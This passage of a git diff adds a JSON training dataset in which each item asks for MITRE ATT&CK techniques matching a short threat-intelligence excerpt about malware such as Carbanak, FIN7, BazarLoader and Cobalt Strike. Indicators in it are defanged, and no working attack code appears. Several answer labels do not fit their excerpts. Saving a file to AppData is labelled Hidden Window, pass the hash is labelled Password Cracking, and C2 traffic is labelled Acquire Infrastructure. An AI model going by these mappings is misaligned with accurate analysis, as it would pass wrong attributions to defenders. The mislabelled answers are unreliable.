diff --git "a/train/all_zeroshot_train.json" "b/train/all_zeroshot_train.json" new file mode 100644--- /dev/null +++ "b/train/all_zeroshot_train.json" @@ -0,0 +1,21407 @@ +[ + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.", + "output": "- T1056.003: Input Capture - Web Portal Capture\n- T1550.004: Use Alternate Authentication Material - Web Session Cookie\n- T1113: Screen Capture\n- T1539: Steal Web Session Cookie\n- T1020.001: Automated Exfiltration - Traffic Duplication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 gathers information on network shares.", + "output": "- T1039: Data from Network Shared Drive" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command (Figure 2) to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command (Figure 3).", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059: Command and Scripting Interpreter\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In Carbanak attacks, the groups\u2019 attacks can involve logging into services that accept remote connections and using stolen password hashes through the \u201cpass the hash\u201d method", + "output": "- T1110.002: Brute Force - Password Cracking\n- T1550.002: Use Alternate Authentication Material - Pass the Hash" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.", + "output": "- T1218.005: System Binary Proxy Execution - Mshta\n- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In both Carbanak and FIN7 attacks, communication with users\u2019 compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group\u2019s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Panda Stealer is deployed through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files. We have identified two infection chains: in one, an .XLSM attachment contains macros that download a loader (Figure 1). Then, the loader downloads and executes the main stealer. ", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1137.001: Office Application Startup - Office Template Macros\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from a paste.ee URL.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Carbanak also collects information on accounts, files and directories, group permissions, and registries.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions", + "output": "- T1480: Execution Guardrails" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After moving through the network and identifying assets to target, the next step would be to gather key data. At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware).", + "output": "- T1056: Input Capture\n- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike was also used to continuously communicate with the main command-and-control (C&C) server.", + "output": "- T1583.004: Acquire Infrastructure - Server\n- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This example of BazarLoader generated command and control (C2) activity, retrieving BazarBackdoor using HTTPS traffic from 104.248.174[.]225 over TCP port 443.", + "output": "- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Use the latest attack patterns, Kubernetes (K8s) or Docker API targeting, which were featured in two reports focusing on TeamTNT operations, Black-T: New Cryptojacking Variant from TeamTNT and Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes.", + "output": "- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.", + "output": "- T1590.005: Gather Victim Network Information - IP Addresses\n- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1064: Scripting\n- T1546.013: Event Triggered Execution - PowerShell Profile\n- T1027.003: Obfuscated Files or Information - Steganography\n- T1216: System Script Proxy Execution\n- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The PowerShell command executed after the Microsoft Exchange exploitation is responsible for downloading and executing another PowerShell script from the command-and-control (C&C) server 185[.]82[.]219[.]201", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1064: Scripting\n- T1546.013: Event Triggered Execution - PowerShell Profile\n- T1059: Command and Scripting Interpreter\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe.", + "output": "- T1588.002: Obtain Capabilities - Tool\n- T1595: Active Scanning" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Our analysis shows that the Crimson RAT malware is compiled as a .NET binary with minimal obfuscation. This could indicate that the cybercriminal group behind this campaign is possibly not well-funded.", + "output": "- T1587.001: Develop Capabilities - Malware\n- T1588.001: Obtain Capabilities - Malware\n- T1001: Data Obfuscation\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Earth Karkaddan actors are known to use the Crimson RAT malware in its campaigns to communicate with its command-and-control (C&C) server to download other malware or exfiltrate data.", + "output": "- T1583.004: Acquire Infrastructure - Server\n- T1588.001: Obtain Capabilities - Malware\n- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After downloading and executing these files, one of the child processes created other files and the executable setup.exe/setup-installv1.3.exe, which was extracted from 320yea_Teamviewer_15206.zip via WinRAR.exe. This file seems to be the source of most of the downloaded malicious files, as seen in the following figure.", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The BazarLoader DLL was immediately copied to another location and made persistent through the Windows registry", + "output": "- T1112: Modify Registry\n- T1543.003: Create or Modify System Process - Windows Service\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network", + "output": "- T1592: Gather Victim Host Information\n- T1595: Active Scanning" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malicious Excel spreadsheet was discovered on Wednesday, Aug. 18, 2021, and it has a last modified date of Tuesday, Aug. 17. The filename had an .xlsb file extension. This file has macros designed to infect a vulnerable Windows host with BazarLoader. Figure 2 shows a screenshot of the Excel file.", + "output": "- T1137.001: Office Application Startup - Office Template Macros\n- T1588.001: Obtain Capabilities - Malware\n- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the executable file is executed, it will proceed to unzip a file named mdkhm.zip and then execute a Crimson RAT executable named dlrarhsiva.exe.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BazarLoader is Windows-based malware spread through various methods involving email", + "output": "- T1534: Internal Spearphishing\n- T1566: Phishing\n- T1566.001: Phishing - Spearphishing Attachment\n- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1588.001: Obtain Capabilities - Malware\n- T1587.001: Develop Capabilities - Malware\n- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)", + "output": "- T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n- T1543.003: Create or Modify System Process - Windows Service\n- T1574: Hijack Execution Flow\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The spreadsheet\u2019s macro code retrieved a malicious Dynamic Link Library (DLL) file for BazarLoader from the following URL", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": " this Excel template was created by a threat actor trying to instill confidence by taking advantage of the DocuSign brand name and image.", + "output": "- T1221: Template Injection\n- T1137.001: Office Application Startup - Office Template Macros" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system.", + "output": "- T1592: Gather Victim Host Information\n- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1003: OS Credential Dumping\n- T1113: Screen Capture\n- T1125: Video Capture\n- T1056: Input Capture\n- T1590: Gather Victim Network Information\n- T1589: Gather Victim Identity Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike leads to reconnaissance of an infected host\u2019s environment. In our lab environments, this reconnaissance activity can start within a few minutes after Cobalt Strike traffic first appears.", + "output": "- T1588.001: Obtain Capabilities - Malware\n- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this case, a Cobalt Strike DLL file was sent through Bazar C2 traffic and saved to the infected Windows host under the user\u2019s AppData\\Roaming directory", + "output": "- T1564.003: Hide Artifacts - Hidden Window" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike is an adversary simulation platform developed for penetration testers by Raphael Mudge, founder of Strategic Cyber LLC. Designed for interoperability with other platforms such as Metasploit, NMAP, and Powershell Empire, it can be run using Armitage, a graphic user interface (GUI) developed by Mudge, initially for Metasploit. Armitage and Cobalt Strike are designed around a team server that allows for the sharing of information and the ability to direct and execute well-coordinated actions.", + "output": "- T1061: Graphical User Interface" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Even though network monitoring and detection capabilities do not come easy for many organizations, they can generally offer a high return on investment if implemented correctly. Malware has to contact its C2 server if it is to receive further instructions. This article will demonstrate how to detect this communication before threat actors accomplish their objectives. There are a couple of factors that we can utilize to fingerprint any suspicious traffic and subsequent infrastructure. Before we get into that part, we should first discuss what makes Cobalt Strike so versatile.", + "output": "- T1102.002: Web Service - Bidirectional Communication\n- T1102.003: Web Service - One-Way Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fifteen minutes after domain enumeration, we observed successful lateral movement to two endpoints on the network. Ten minutes after lateral movement, a PowerShell Cobalt Strike loader executed as a service on a server. Even though the execution was not successful, the threat actors kept trying, a total of eight times, until it finally worked. Windows Defender real-time monitoring was then disabled, the LSASS.exe process was dumped using SysInternals ProcDump, and privilege was escalated to \u201cSYSTEM\u201d using named pipe impersonation.\u00a0", + "output": "- T1546.013: Event Triggered Execution - PowerShell Profile\n- T1068: Exploitation for Privilege Escalation\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As days go by, more of the reported ransomware attacks turn out to be related to the new Pay2Key ransomware. The attacker followed the same procedure to gain a foothold, propagate and remotely control the infection within the compromised companies.", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUGARDUMP using SMTP for C2 communication \u2013 dated to late 2021-early 2022. This variant was downloaded from a known UNC3890 C2 (URL: hxxp://128.199.6[.]246/3-Video-VLC.exe), and is a slightly more advanced version with similar credential harvesting functionality. ", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Essentially, the TDSS botnet kad.dll module is more or less the same as cmd.dll in terms of control function. By running nodes.dat files containing a list of IP addresses of Kad clients in addition to ktzerlrules, which contains a command to download a new nodes.dat file from cybercriminal servers, the owners of the botnet can both include their infected computers in the publicly accessible Kad network and remove them from the network. The publicly accessible Kad network contains no more than 10 TDSS infected computers. This makes replacing the ktzerules file as inefficient as possible, which prevents other cybercriminals from taking control over the botnet. The total number of TDSS infected computers on the closed network number tens of thousands.", + "output": "- T1059: Command and Scripting Interpreter\n- T1588.001: Obtain Capabilities - Malware\n- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We can apply this same concept across other executable traits, such as BOOSTWRITE\u2019s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.", + "output": "- T1129: Shared Modules" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HenBox attempts to hide itself from the app launcher view by running the following code, passing the parameters COMPONENT_ENABLED_STATE_DISABLED (2) and DONT_KILL_APP (1) to the setComponentEnabledSetting() method.", + "output": "- T1564: Hide Artifacts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As our research technique of fingerprinting exploit writers exceeded our initial expectations, we were on the lookout for more exploits to investigate. Soon enough, we came across this blog post from Kaspersky detailing how Sodin (a.k.a Sodinokibi, or REvil), an infamous ransomware, is using a 1-Day exploit for CVE-2018-8453.", + "output": "- T1203: Exploitation for Client Execution\n- T1210: Exploitation of Remote Services\n- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat 